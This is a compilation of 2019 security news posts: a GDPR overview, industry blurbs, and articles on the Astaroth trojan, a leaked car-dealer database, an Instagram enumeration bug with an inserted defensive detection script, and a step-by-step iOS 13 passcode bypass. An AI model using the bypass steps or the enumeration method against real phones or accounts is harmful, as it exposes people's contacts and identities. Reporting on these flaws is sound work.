GDPR, or the General Data Protection Regulation, is a law that the European Union has enforced since May 25, 2018. It replaces the Data Protection Directive of 1995, which was enacted before the widespread use of the internet drastically changed the way data is collected, transmitted, and used.

Another key component of the GDPR is to update regulations about data protection for sensitive personal information. It places an emphasis on the need to protect any and all collected data.

At the core of this new regulation, it aims to simplify, update, and unify the protection of personal data.

Why Does GDPR Matter to You?

The main changes introduced by the GDPR mean that companies can no longer be lax about personal data security. In the past, they could get away with simple tick-box compliance. This is no longer the case.

Here are the top points to consider regarding the General Data Protection Regulation.

  1. A company does not have to be based in the EU to be covered by the GDPR. As long as it collects and uses personal data of individuals in the EU, it must adhere to the regulation.
  2. The fines for violating the GDPR are huge. Serious infringements, such as processing data without the required consent, can net the violating company a fine of up to 4% of its annual global turnover or 20 million euros, whichever is greater.
  3. The definition of personal data has become wider and now explicitly includes online identifiers such as IP addresses and mobile device identifiers.
  4. Individuals now have more rights over the use of their personal data. Companies can no longer bury consent in long-worded terms and conditions; consent to process data must be explicit and freely given.
  5. Technical and organizational measures to protect personal data are mandatory. The regulation names pseudonymization and encryption of personal data as appropriate measures, so companies need to hash (with a key) and encrypt the personal data they hold.
  6. Records of processing activities are mandatory as well. Organizations need a written (electronic) record of everything they do with personal data, capturing the whole lifecycle of the processing.
  7. Data protection impact assessments are required for high-risk processing such as profiling.
  8. Reporting personal data breaches is mandatory. Organizations have a maximum of 72 hours after becoming aware of a breach that puts personal data at risk to report it to the supervisory authority. If the breach poses a high risk to individuals, the affected individuals must also be notified without undue delay.
  9. Organizations whose core activities involve large-scale monitoring of individuals or large-scale processing of sensitive data (and all public authorities) must appoint a Data Protection Officer, who monitors compliance with the regulation and reports directly to the highest management level of the company.
  10. The GDPR requires data protection by design and by default.

There is no doubt that the legal and technical changes the GDPR requires at an organizational level are significant. Achieving compliance takes more than information security or legal teams alone: it takes a GDPR task force drawn from across the organization that understands the changes and their effect on its operations, working together to meet the requirements set forth by the regulation.

Also Read,

GDPR: Non-Compliance Is Not An Option

GDPR Compliance And What You Should Know

How Will The GDPR Survive In The Jungle of Big Data?


CISO do’s and don’ts: Lessons learned

Keeping a business safe from cyber threats while allowing it to thrive is every CISO’s goal. The task is not easy: a CISO has to keep many balls in the air while being buffeted by an increasingly complex and always shifting threat landscape. Consequently, the importance of a good CISO should not be underestimated. Mistakes to avoid, practices to implement Francesco Cipollone, CISO and director at UK-based cybersecurity consultancy NSC42, says that he has seen … More

The post CISO do’s and don’ts: Lessons learned appeared first on Help Net Security.

Threat visibility is imperative, but it’s even more essential to act

Cyberthreats are escalating faster than many organizations can identify, block and mitigate them. Visibility into the expanding threat landscape is imperative, but according to a new threat report released by CenturyLink, it is even more essential to act. “As companies focus on digital innovation, they are entering a world of unprecedented threat and risk,” said Mike Benjamin, head of CenturyLink’s threat research and operations division, Black Lotus Labs. “Threats continue to evolve, as do bad … More

The post Threat visibility is imperative, but it’s even more essential to act appeared first on Help Net Security.

Tor Project’s Bug Smash Fund raises $86K in August

The Tor Project has raised $86,000 for a Bug Smash fund that it will use to pay developers that will address critical flaws in the popular anonymizing network.

The Tor Project has raised $86,000 for a Bug Smash fund that was created to pay developers that will address critical security and privacy issues in the popular anonymizing network.

In early August, the Tor Project announced the creation of the Bug Smash Fund with the intent of paying professionals to support the organization in maintenance work and in smashing bugs.

“The goal of the Bug Smash Fund is to increase the Tor Project’s reserve of funds that allow us to complete maintenance work and smash the bugs necessary to keep Tor Browser, the Tor network, and the many tools that rely on Tor strong, safe, and running smoothly.” reads the announcement published by the Tor Project.

“When we say maintenance and bugs, we are talking about work that is critical—and that we must pay for. This work includes responding quickly to security bugs, improving test coverage, and keeping up with Mozilla’s ESRs. An entire ecosystem relies on us doing so.”

The organization has added donations it received in August 2019 to the Bug Smash Fund.

Any vulnerability that could be used to de-anonymize Tor users, or that attackers could use to disrupt the anonymizing network, is considered critical and must be addressed rapidly; the Bug Smash Fund will pay developers to do that work.

The fund aims to be transparent: donors can track how the money is being used, because the Tor Project will tag every bug ticket funded from it with the “BugSmashFund” tag.

“Want to keep up with the work we’re doing with this fund? There are three ways: (1) Follow the “BugSmashFund” trac ticket tag, (2) watch this blog for updates about the progress of these tickets, and (3) make a donation and opt in for our newsletter to get updates directly to your inbox.” concludes the announcement.

“Want to contribute anonymously, with cryptocurrency, or by mail? Here’s how.”

Pierluigi Paganini

(SecurityAffairs – Tor Project, privacy)

The post Tor Project’s Bug Smash Fund raises $86K in August appeared first on Security Affairs.

Astaroth Trojan leverages Facebook and YouTube to avoid detection

Cofense experts uncovered a new variant of the Astaroth Trojan that uses Facebook and YouTube in the infection process.

Researchers at Cofense have uncovered a phishing campaign targeting Brazilian citizens with the Astaroth Trojan that uses Facebook and YouTube in the infection process.

The attack chain is very complex and starts with phishing messages that carry an .htm file as an attachment. At every turn in the infection chain, the malware relies on legitimate services and on interaction from the end user, which helps it evade detection.

“Cofense Intelligence™ has identified a phishing campaign targeting Brazilian citizens with the Astaroth Trojan in which Facebook and YouTube profiles are used in support of the infection,” reads the analysis published by Cofense. “There are numerous stages within this infection chain that could have been stopped with properly layered defenses on the email and network security stack. However, at each step of the infection, this campaign uses trusted sources and the end user to help advance to the next stage, ultimately leading to an eventual exfiltration of sensitive information.”

The Astaroth Trojan was first spotted by security firm Cofense in late 2018, when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts, LOLbins are very effective at evading antivirus software.

In the recent campaign, the experts observed three different kinds of emails written in Portuguese: one using an invoice theme, another a show-ticket theme and a third a civil-lawsuit theme.

“This campaign also utilized Cloudflare workers (JavaScript execution environment) to download modules and payloads, negating network security measures. Using these resources adds to the trusted source methodology employed by this campaign to bypass the security stack.” continues the analysis.

Once the victims have clicked on the attachment, the .HTM file downloads a .ZIP archive that contains a malicious .LNK file. The .LNK file then downloads JavaScript code from a Cloudflare workers domain, that in turn downloads multiple modules and payloads that are used to help obfuscate and execute a sample of the Astaroth information-stealer.

Among the files downloaded during the infection are two .DLL files that are joined together and side-loaded by a legitimate Microsoft binary, ‘C:\Program Files\Internet Explorer\ExtExport.exe’.

Running the malicious code inside a legitimate program, with the two DLL halves fetched from a trusted source, lets the malware slip past security controls that trust the host process.

“After ExtExport.exe is running with the malicious code side-loaded, it uses a technique known as process hollowing to execute a legitimate program within a suspended state.” continues the expert. “Process hollowing is used to inject malicious code retrieved from multiple files downloaded by the earlier JavaScript. The legitimate programs that were targeted for process hollowing were unins000.exe, svchost.exe, and userinit.exe.”

The experts noticed that the Astaroth sample involved in this campaign uses YouTube and Facebook profiles to host and maintain its C2 configuration data.

The C2 data is base64-encoded and additionally wrapped in a custom encryption layer; the attackers place it inside Facebook posts or in the profile (about) information of YouTube accounts. Because the traffic goes to well-known, TLS-protected social networks, this trick lets the attackers bypass content filtering and other network security measures.

“The threat actors are also able to dynamically change the content within these trusted sources so they can deter the possibility of their infrastructure being taken down.” the researchers continue.

The Astaroth stealer is able to steal sensitive information, including financial data, passwords stored in the browser, email client credentials and SSH credentials. The information gathered by the malware is protected with two layers of encryption and sent via HTTPS POST to a site from the C2 list; the experts noticed that most of these sites are hosted on Appspot.

This phishing campaign exclusively targets Brazilians: the experts noticed that the initial .ZIP archive is geo-fenced to Brazil, so requests from outside the country (a sandbox or an analyst’s machine, for instance) will not receive the payload.

However, experts warn that attackers could expand their activities to other countries using similar tactics.

“Astaroth leverages legitimate Microsoft Windows services to help propagate and deliver the payloads,” concludes the analysis.

In July, experts at the Microsoft Defender ATP Research Team discovered a fileless malware campaign delivering the Astaroth information stealer.

Pierluigi Paganini

(SecurityAffairs – Astaroth, malware)

The post Astaroth Trojan leverages Facebook and YouTube to avoid detection appeared first on Security Affairs.

Four in five businesses need ways to better secure data without slowing innovation

While data loss protection is critical to Zero Trust (ZT), fewer than one in five organizations report their data loss prevention solutions provide transformational benefits and more than 80 percent say they need a better way to secure data without slowing down innovation, according to Code42. ZT architectures are based on the principle of “trust no one, verify everything,” abolishing the idea of a trusted network within a data security perimeter and requiring companies to … More

The post Four in five businesses need ways to better secure data without slowing innovation appeared first on Help Net Security.

Exploitation of IoT devices and Windows SMB attacks continue to escalate

Cybercriminals upped the intensity of IoT and SMB-related attacks in the first half of 2019, according to a new F-Secure report. The report underscores the threats IoT devices face if not properly secured when online, as well as the continued popularity of Eternal Blue and related exploits two years after WannaCry. F-Secure’s honeypots – decoy servers that are set up to lure in attackers for the purpose of collecting information – measured a twelvefold increase … More

The post Exploitation of IoT devices and Windows SMB attacks continue to escalate appeared first on Help Net Security.

Open source breach and attack simulation tool Infection Monkey gets new features

Guardicore, a leader in internal data center and cloud security, unveiled new capabilities for its Infection Monkey that make it the industry’s first Zero Trust assessment tool. Added features extend the functionality of the already successful Infection Monkey, a free, open source breach and attack simulation tool used by thousands to demonstrate and analyze their environments against lateral movement and attacks. The latest version of Infection Monkey enables both enterprise security leaders and network engineers … More

The post Open source breach and attack simulation tool Infection Monkey gets new features appeared first on Help Net Security.

Only one quarter of retail banks have adopted an integrated approach to financial crime systems

Most banks plan to integrate their fraud and financial crime compliance systems and activities in response to new criminal threats and punishing fines, with the U.K. leading the pack, according to a survey by Ovum, on behalf of FICO. Responses show that U.S. systems are less integrated than Canada’s – only 25 percent of U.S. banks have a common reporting line for both fraud and compliance, versus 60 percent for Canada. The survey also found … More

The post Only one quarter of retail banks have adopted an integrated approach to financial crime systems appeared first on Help Net Security.

Cyber Battle of the Emirates: Training the next generation of cyber security pros

Held annually in Asia, Europe and the Middle East, Hack In The Box conferences bring together the world’s top cyber security experts to share and discuss their latest knowledge, ideas and techniques with security professionals and students. The next HITB event is HITB+ CyberWeek, which takes place October 12th – 17th at Emirates Palace, Abu Dhabi. As usual, it will offer security trainings, talks, and live challenges. Cyber Battle of the Emirates Among the live … More

The post Cyber Battle of the Emirates: Training the next generation of cyber security pros appeared first on Help Net Security.

GDPR One Year Anniversary: The Civil Society Organizations’ View

GDPR is a landmark in privacy jurisdiction. Through its 99 articles, it sets a framework for both businesses and individuals on their rights and responsibilities when it comes to protecting privacy. The most important element in my opinion is that privacy functions as a fundamental human right and needs to be protected. The Authorities View Although […]… Read More

The post GDPR One Year Anniversary: The Civil Society Organizations’ View appeared first on The State of Security.

Irdeto launches Trusted Home enabling CSPs to secure the entire smart home beyond the router

Consumer demand for IoT devices is growing rapidly as they look to make the most of connectivity and the smart home. However, the increase in IoT devices also increases the number of security vulnerabilities and creates challenges for communication service providers (CSPs) and consumers alike around control of the smart home. To address these challenges, Irdeto has launched Trusted Home which enables CSPs to secure the entire smart home beyond the router, increase ARPU by … More

The post Irdeto launches Trusted Home enabling CSPs to secure the entire smart home beyond the router appeared first on Help Net Security.

TSYS Authentication Platform helps companies fight synthetic and account takeover fraud

TSYS announced a new authentication product that provides unprecedented real-time verification of customer identities. The new offering, the TSYS Authentication Platform, relies on customer experience data collected from direct cardholder touchpoints and integrates into TSYS clients’ existing authentication systems. TSYS Authentication Platform is available in Europe and will be launched in North America in 2020. The new product is designed to verify that a person is who he or she claims to be, reducing application, … More

The post TSYS Authentication Platform helps companies fight synthetic and account takeover fraud appeared first on Help Net Security.

HITRUST issues guidance for relying on work of internal audit departments in CSF assessments

HITRUST, a leading data protection standards development and certification organization, released updated guidance for placing reliance on the results of previously performed audits, assessments, and inspections. These policy and methodology updates create opportunities for greater assessment efficiency and customer cost savings. HITRUST has historically afforded two opportunities for External Assessors (formerly referred to as HITRUST CSF Assessors) to rely on the results of previously performed control testing, one being Inheritance of the results of other … More

The post HITRUST issues guidance for relying on work of internal audit departments in CSF assessments appeared first on Help Net Security.

New Razberi features use deep packet inspection to monitor video quality and camera security

Razberi Technologies has extended its Razberi Monitor solution with new video health monitoring features. Razberi leverages its patent-pending deep packet inspection technology to assure security professionals that their cameras are providing secure and reliable audio and video streams. Razberi’s latest software automatically reboots cameras and sends alerts when problems are detected. Razberi Monitor provides complete system health and cyber monitoring solutions for video surveillance systems. Razberi Monitor integrates video health with award-winning Razberi CameraDefense for … More

The post New Razberi features use deep packet inspection to monitor video quality and camera security appeared first on Help Net Security.

Easy NX Connect for Egnyte enables fast and secure file sharing

Fujitsu Computer Products of America, the established leader in document imaging, announced a new integration with the FUJITSU fi-7300NX document scanner and Egnyte. Easy NX Connect for Egnyte is a convenient software license that enables organizations to scan directly to Egnyte via a quick tap and scan into a secure, sharable workflow. Easy NX Connect for Egnyte includes NFC authentication and direct integration into Egnyte’s Enterprise File Sharing and Content Governance platform. In conjunction with … More

The post Easy NX Connect for Egnyte enables fast and secure file sharing appeared first on Help Net Security.

Bank Mayapada chooses NICE Actimize to update its AML compliance programs

NICE Actimize, a NICE business and the leader in autonomous financial crime management, has been chosen by PT Bank Mayapada Internasional, Tbk, Jakarta, Indonesia, to launch full-scale improvements within its financial crime operations with anti-money laundering compliance and investigation management solutions that employ artificial intelligence and machine learning technology. To more effectively meet the needs of its regulators, Bank Mayapada will implement an array of components from NICE Actimize’s Autonomous Anti-Money laundering portfolio, including Suspicious … More

The post Bank Mayapada chooses NICE Actimize to update its AML compliance programs appeared first on Help Net Security.

Oliver Wyman and Next Peak offer a broader and enhanced range of advisory and operational services

Global management consulting firm Oliver Wyman and Next Peak, an operational cyber defense consulting company, announced a new collaboration to offer a broader and enhanced range of advisory and operational services to clients focused on defending and improving resilience against global cyber threats. “At a time when cyber threats are becoming increasingly common, more dangerous, and more sophisticated, leaders across all industries are looking for ways to protect their companies,” said Michael Zeltkevic, Partner and … More

The post Oliver Wyman and Next Peak offer a broader and enhanced range of advisory and operational services appeared first on Help Net Security.

Snowflake and FedResults partnership provides cloud-based solutions for government

Snowflake, the data warehouse built for the cloud, announced that it has a public sector distribution relationship with FedResults, a government-focused IT provider. This partnership will enable Snowflake and FedResults to provide secure, powerful, flexible cloud data warehouse and analytics solutions to federal agencies. Bloomberg Government analysts project that the U.S. Federal Government will invest more than $93B in information technology programs in fiscal year 2020. The 2019 Federal Cloud Computing Strategy, Cloud Smart is … More

The post Snowflake and FedResults partnership provides cloud-based solutions for government appeared first on Help Net Security.

Digital River brings its payments, tax and compliance capabilities to Salesforce AppExchange

Digital River announced it has launched an integration to bring its payments, tax and compliance capabilities to Salesforce AppExchange, empowering customers to connect with their customers and partners in entirely new ways. The integration of Salesforce Commerce Cloud and Digital River lets brands create efficient online buying experiences with a solution designed to grow revenue, expand internationally and help protect brands from risks associated with selling online. The on-demand shopping experience is now ingrained in … More

The post Digital River brings its payments, tax and compliance capabilities to Salesforce AppExchange appeared first on Help Net Security.

HID Global acquires HydrantID to secure enterprise data, IT systems, networks, and the IoT

HID Global, a worldwide leader in trusted identity solutions, announced that it has acquired HydrantID, a provider of management and automation services to secure enterprise organizations’ data, IT systems, networks, and the Internet of Things (IoT). Specializing in public key infrastructure (PKI) as a service, HydrantID has issued over three million PKI credentials and secured over 125,000 domains – a perfect complement to HID’s IdenTrust business, which is the world’s leading digital certification authority. HydrantID … More

The post HID Global acquires HydrantID to secure enterprise data, IT systems, networks, and the IoT appeared first on Help Net Security.

Odaseva records growth and supports over a trillion documents in Salesforce

Odaseva, the unified cloud data protection, compliance and operations platform for enterprises running Salesforce as a business-critical application, announced that it has seen triple year over year growth, and after only seven years of operation, supports a staggering one trillion Salesforce records, with over 10 million enterprise-level internal Salesforce customers. Odaseva’s explosive growth is in part due to the influx of new data privacy and governance laws such as GDPR or CCPA, demanding that businesses … More

The post Odaseva records growth and supports over a trillion documents in Salesforce appeared first on Help Net Security.

Week in review: Simjacker attacks, critical Exim flaw, Sandboxie becomes freeware

Here’s an overview of some of last week’s most interesting news, interviews and articles: More than a year after GDPR implementation, half of UK businesses are not fully compliant 52% of UK businesses are not fully compliant with the regulation, more than a year after its implementation, according to a survey of UK GDPR decision-makers conducted on behalf of Egress. Simjacker vulnerability actively exploited to track, spy on mobile phone owners Following extensive research, AdaptiveMobile … More

The post Week in review: Simjacker attacks, critical Exim flaw, Sandboxie becomes freeware appeared first on Help Net Security.

Drone attacks hit two Saudi Arabia Aramco oil plants

Drone attacks have hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them is the Abqaiq site.

Saudi Arabia’s oil production suffered severe damage after a swarm of explosive drones hit two major oil facilities run by the state-owned company Aramco.

Images of a huge blaze at Abqaiq, the site of Aramco’s largest oil processing plant, are circulating online. A second drone attack hit the Khurais oilfield. Abqaiq is about 60km south-west of Dhahran; Khurais, 200km further south-west, is the country’s second-largest oilfield.

According to local media, fire brigade teams brought the fires at both facilities under control.

The two facilities are located in Abqaiq and Khurais, Saudi Arabia’s interior ministry said. (Photo: Twitter videograb | @Sumol67)

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant; according to a spokesman for the group, it deployed 10 drones in the operation.

The group is threatening Saudi Arabia with further attacks. The Iran-aligned Houthi movement has been fighting the Yemeni government and a Saudi-led coalition of regional countries since 2015, when President Abdrabbuh Mansour Hadi was driven out of Sanaa by the Houthis.

“The military spokesman, Yahya Sarea, told al-Masirah TV, which is owned by the Houthi movement and is based in Beirut, that further attacks could be expected in the future.” reported the BBC.

“He said Saturday’s attack was one of the biggest operations the Houthi forces had undertaken inside Saudi Arabia and was carried out in “co-operation with the honourable people inside the kingdom”.”

US Secretary of State Mike Pompeo blamed Iran for coordinating the attacks, adding that the world is facing an unprecedented attack on its energy supply.

The official Saudi statement confirmed the drone strikes without naming a perpetrator:

“At 04:00 (01:00 GMT), the industrial security teams of Aramco started dealing with fires at two of its facilities in Abqaiq and Khurais as a result of… drones,” the official Saudi Press Agency reported. “The two fires have been controlled.”

The attacks will have a dramatic impact on Saudi Arabia’s oil supply; output could be cut by 50 percent following the incidents.

These latest attacks demonstrate the potential impact of drone strikes against critical infrastructure. At the time of writing it is not clear whether the Houthi group used weaponized commercial drones or obtained military support from Iran.

“The Saudi Air Force has been pummelling targets in Yemen for years. Now the Houthis have a capable, if much more limited, ability to strike back. It shows that the era of armed drone operations being restricted to a handful of major nations is now over.” continues the BBC.

Groups like the Houthis and Hezbollah have access to drone technology and could use it in sophisticated operations. Intelligence analysts fear that the escalating tensions in the region could trigger a world oil crisis.

Pierluigi Paganini

(SecurityAffairs – drone attacks, Saudi Arabia)

The post Drone attacks hit two Saudi Arabia Aramco oil plants appeared first on Security Affairs.

Security Affairs newsletter Round 231

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folks, I have suspended the newsletter service, but I’ll continue to provide you with a list of published posts every week through the blog.

Once again thank you!

Experts found Joker Spyware in 24 apps in the Google Play store
Toyota Boshoku Corporation lost over $37 Million following BEC attack
University, Professional Certification or Direct Experience?
WordPress 5.2.3 fixes multiple issues, including some severe XSS flaws
Belarusian authorities seized XakFor, one of the largest Russian-speaking hacker sites
China-linked APT3 was able to modify stolen NSA cyberweapons
Stealth Falcon New Malware Uses Windows BITS Service to Stealthy Exfiltrate Data
Stealth Falcon’s undocumented backdoor uses Windows BITS to exfiltrate data
Symantec uncovered the link between China-Linked Thrip and Billbug groups
Telegram Privacy Fails Again
Wikipedia suffered intermittent outages as a result of a malicious attack
DoS attack that caused disruption at US power utility exploited a known flaw
Millions of Telestar Digital GmbH IoT radio devices can be remotely hacked
Police dismantled Europe’s second-largest counterfeit currency network on the dark web
Robert Downey Jr’s Instagram account has been hacked
Adobe September 2019 Patch Tuesday updates fix 2 code execution flaws in Flash Player
Dissecting the 10k Lines of the new TrickBot Dropper
Microsoft Patch Tuesday updates for September 2019 fix 2 privilege escalation flaws exploited in attacks
NetCAT attack allows hackers to steal sensitive data from Intel CPUs
Some models of Comba and D-Link WiFi routers leak admin credentials
The Wolcott school district suffered a second ransomware attack in 4 months
Iran-linked group Cobalt Dickens hit over 60 universities worldwide
LokiBot info stealer involved in a targeted attack on a US Company
SAP September 2019 Security Patch Day addresses four Security Notes rated as Hot News
SimJacker attack allows hacking any phone with just an SMS
Poland to establish Cyberspace Defence Force by 2024
The US Treasury placed sanctions on North Korea linked APT Groups
WatchBog cryptomining botnet now uses Pastebin for C2
Expert disclosed passcode bypass bug in iOS 13 a week before its release
Hackers stole payment data from Garmin South Africa shopping portal
InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets

Pierluigi Paganini

(SecurityAffairs – Newsletter, hacking)

The post Security Affairs newsletter Round 231 appeared first on Security Affairs.

Dealer Leads, a car dealer marketing firm, exposed 198 Million records online

A researcher discovered an unsecured database exposed online, belonging to car dealership marketing firm Dealer Leads, containing 198 million records.

The researcher Jeremiah Fowler discovered an unsecured database exposed online that belongs to the car dealership marketing firm Dealer Leads.

The archive contained 198 million records, 413GB of data in total, including information on potential car buyers and vehicles, loan and finance inquiries, log data with visitors’ IP addresses, and more.

“On August 19th I reported a non-password protected database that contained a massive 413GB of data and a total of 198 million records. The most shocking part was that I had seen this dataset several times in the previous weeks, but was unable to identify the owner.” reports Security Discovery. “I spent several days trying to identify the owner of the database and there was no clear indication in the millions of records.”

Dealer Leads provides content relevant and related to the auto industry for franchise and independent car dealerships; the company’s website describes it as follows:

“dominates the automotive digital marketing industry with highly used automobile search strings turned into online inventory advertising classified sites, service sites, finance sites etc. Car shoppers have needs, and DealerLeads matches those needs in live searches.”

The Elasticsearch database was accessible from any browser without authentication; its records included names, email addresses, phone numbers, postal addresses, IP addresses and other sensitive or identifiable information, all in plain text.

The archive also included IP addresses, ports, pathways, and storage info.

The good news is that after the expert reported his discovery to the company, it secured the database by restricting public access to the archive.

At the time of writing it is not clear how long the data remained exposed online and if someone had access to its records.

“Dealer Leads acted fast to restrict public access immediately after the notification. Unfortunately, the data was exposed for an undetermined length of time and it is unclear who else may have had access to the millions of records that were publicly exposed.” Security Discovery concludes.

“It is unclear if Dealer Leads has notified individuals, dealerships, or authorities about the data incident. Because of the size and scope of the network, applicants and potential customers may not know if their data was exposed.”

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Dealer Leads, a car dealer marketing firm, exposed 198 Million records online appeared first on Security Affairs.

A bug in Instagram exposed user accounts and phone numbers

Facebook addressed a vulnerability in Instagram that could have allowed attackers to access private user information.

The security researcher @ZHacker13 discovered a flaw in Instagram that allowed an attacker to access account information, including user phone number and real name.

ZHacker13 discovered the vulnerability in August and reported the issue to Facebook that asked for additional time to address the issue. The social network giant has finally fixed the flaw.

“In putting this article together, I had the security researcher run tests on the platform and he successfully retrieved “secure” user data I know to be real. This data included users’ real names, Instagram account numbers and handles, and full phone numbers.” reads a post published by Forbes. “The linking of this data is all an attacker would need to target those users. It would also enable automated scripts and bots to build user databases that could be searched, linking high-profile or highly-vulnerable users with their contact details.”

The expert also warns that attackers could use automated scripts and bots to collect user data from the platform, linking users with their contact details.

Just a week before ZHacker13 disclosed the bug, phone numbers associated with 419 million accounts of the social network giant were exposed online.

It is not clear if the two incidents could have the same root cause.

“I found a high vulnerability on Instagram that can cause a serious data leak,” @ZHacker13 told Forbes. “The vulnerability is still active—and it looks like Facebook are not very serious about patching it. Exploiting this vulnerability would enable an attacker using an army of bots and processors to build a searchable/attackable database of users, bypassing protections protecting that data.”

The expert explained that he discovered the flaw by using the platform’s contact importer in combination with a brute-force attack on its login form.

The attack scenario is composed of two steps:

  • The attacker carries out a brute force attack on Instagram’s login form, checking one phone number at a time for those linked to a live Instagram account.
  • The attacker finds the account name and number linked to the phone number by exploiting Instagram’s Sync Contacts feature.
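A defensive counterpart to the two steps above, added here as example code (not Facebook’s or the researcher’s): two checks over constructed authentication and contact-importer log lines. Step 1 shows up as one source cycling through many distinct phone identifiers in a short window, which per-account lockout never sees because no single account is hammered; step 2 shows up as one account pushing an outsized contact list through the importer. The log format, field names and thresholds are assumptions.

```python
"""Detecting the two-step phone-number enumeration described above in
constructed logs. Example code added to this page, not Facebook's or
@ZHacker13's code; log format and thresholds are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) event=(?P<event>\S+) ?(?P<rest>.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")


def parse(line):
    """Turn one assumed-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
           "ip": m["ip"], "event": m["event"]}
    rec.update(KV_RE.findall(m["rest"]))     # remaining key=value pairs
    return rec


def flag_login_enumeration(lines, max_distinct=10, window=timedelta(minutes=5)):
    """Step 1: one source probing many *distinct* identifiers on the login form.
    Counts distinct identifiers per IP inside a sliding window (lines must be in
    time order per IP); guessing passwords for one account does not trip this."""
    recent = defaultdict(deque)               # ip -> deque of (ts, identifier)
    flagged = set()
    for rec in filter(None, map(parse, lines)):
        if rec["event"] != "login_attempt":
            continue
        q = recent[rec["ip"]]
        q.append((rec["ts"], rec["identifier"]))
        while rec["ts"] - q[0][0] > window:   # drop entries older than the window
            q.popleft()
        if len({ident for _, ident in q}) > max_distinct:
            flagged.add(rec["ip"])
    return flagged


def flag_contact_import(lines, max_contacts=2000):
    """Step 2: one account feeding an unusually large contact list to the importer,
    which is how confirmed numbers get turned into names and handles."""
    totals = defaultdict(int)
    for rec in filter(None, map(parse, lines)):
        if rec["event"] == "contact_import":
            totals[rec["account"]] += int(rec["count"])
    return {acct for acct, n in totals.items() if n > max_contacts}


# Constructed sample log (RFC 5737 documentation addresses, made-up numbers).
_T0 = datetime(2019, 9, 12, 10, 0, 0)


def _ts(seconds):
    return (_T0 + timedelta(seconds=seconds)).strftime("%Y-%m-%dT%H:%M:%SZ")


SAMPLE_LOG = (
    # 15 different numbers probed from one IP in 45 seconds: enumeration
    [f"{_ts(3 * i)} ip=203.0.113.5 event=login_attempt identifier=+55119{i:08d} result=no_account"
     for i in range(15)]
    # 15 guesses against a single number from another IP: password guessing, not enumeration
    + [f"{_ts(3 * i)} ip=198.51.100.7 event=login_attempt identifier=+5511987654321 result=bad_password"
       for i in range(15)]
    + [f"{_ts(300)} ip=203.0.113.5 event=contact_import account=attacker01 count=1500",
       f"{_ts(360)} ip=203.0.113.5 event=contact_import account=attacker01 count=1500",
       f"{_ts(420)} ip=192.0.2.9 event=contact_import account=alice count=120"]
)

if __name__ == "__main__":
    print("enumerating IPs:", flag_login_enumeration(SAMPLE_LOG))
    print("bulk importers:", flag_contact_import(SAMPLE_LOG))
```

Both rules are cheap to run as a streaming job; the useful response to the first is to stop distinguishing “no account” from “wrong password” for that source rather than to lock accounts, since the attacker is not targeting any one of them.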

A Facebook spokesman explained that his company modified the contact importer in Instagram to address the flaw.

“We have changed the contact importer on Instagram to help prevent potential abuse. We are grateful to the researcher who raised this issue, and to the entire research community for their efforts.” said the spokesman.

Facebook, after initial resistance, reconsidered and said it would reward @ZHacker13 for reporting the bug under its bug bounty program.

“Facebook had also told @ZHacker13 that although the vulnerability was serious, there was internal awareness of the issue and so it was not eligible for a reward under the bounty scheme.” continues the post. “This would have set a terrible precedent and disincentivized researchers from coming forwards with similar vulnerabilities. I questioned Facebook on its decision, and the company reconsidered and told me it has “reassessed” the discovery of the bug and would reward the researcher after all. “

Facebook pointed out that there is no evidence that any user data has been abused by threat actors.  

Pierluigi Paganini

(SecurityAffairs – Instagram, hacking)

The post A bug in Instagram exposed user accounts and phone numbers appeared first on Security Affairs.

Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.

Expert disclosed passcode bypass bug in iOS 13 a week before its release

A security researcher disclosed a passcode bypass just a week before Apple’s planned release of the new iOS 13 operating system on September 19.

Apple users are eagerly awaiting the release of iOS 13, planned for September 19, but a security expert could spoil the party.

The security researcher Jose Rodriguez discovered a passcode bypass issue that could be exploited by an attacker with physical access to read an iPhone’s contacts and other information even on a locked device.

Below the step by step procedure to exploit the passcode bypass:

  1. Reply to an incoming call with a custom message.
  2. Enable the VoiceOver feature.
  3. Disable the VoiceOver feature.
  4. Add a new contact to the custom message.
  5. Click on the contact’s image to open the options menu and select “Add to existing contact”.
  6. When the list of contacts appears, tap on the other contact to view its info.

Below the video PoC published by Rodriguez that shows how to see a device’s contact information.

Rodriguez reported the flaw to Apple on July 17th, 2019, at the time the new iOS version was still in beta. The expert disclosed the issue on September 11th and at the time Apple had still not addressed the flaw.

Experts hope that Apple will be able to fix the bug by September 19th.

Rodriguez has discovered many other passcode bypass issues in the past. In October 2018, a few hours after Apple released iOS 12.1, he found a passcode bypass that could have been exploited to see all contacts’ private information on a locked iPhone.

A few weeks before that, he had discovered another passcode bypass vulnerability in iOS 12 that could have been exploited to access photos and contacts on a locked iPhone XS.

The researcher had also disclosed a further passcode bypass flaw that could have been exploited to access photos and contacts on a locked iPhone XS.

Pierluigi Paganini

(SecurityAffairs – iOS 13, passcode bypass)

The post Expert disclosed passcode bypass bug in iOS 13 a week before its release appeared first on Security Affairs.

Are Cash Transfer Apps Safe to Use? Here’s What Your Family Needs to Know

I can’t recall the last time I gave my teenage daughter cash for anything. If she needs money for gas, I Venmo it. A Taco Bell study break with the roommates? No problem. With one click, I transfer money from my Venmo account to hers. She uses a Venmo credit card to make her purchase. To this mom, cash apps may be the best thing to happen to parenting since location tracking became possible. But as convenient as these apps may be, are they safe for your family to use?

How do they work?

The research company, eMarketer, estimates that 96.0 million people used Peer-to-Peer (P2P) payment services this year (that’s 40.4% of all mobile phone users), up from an estimated 82.5 million last year.

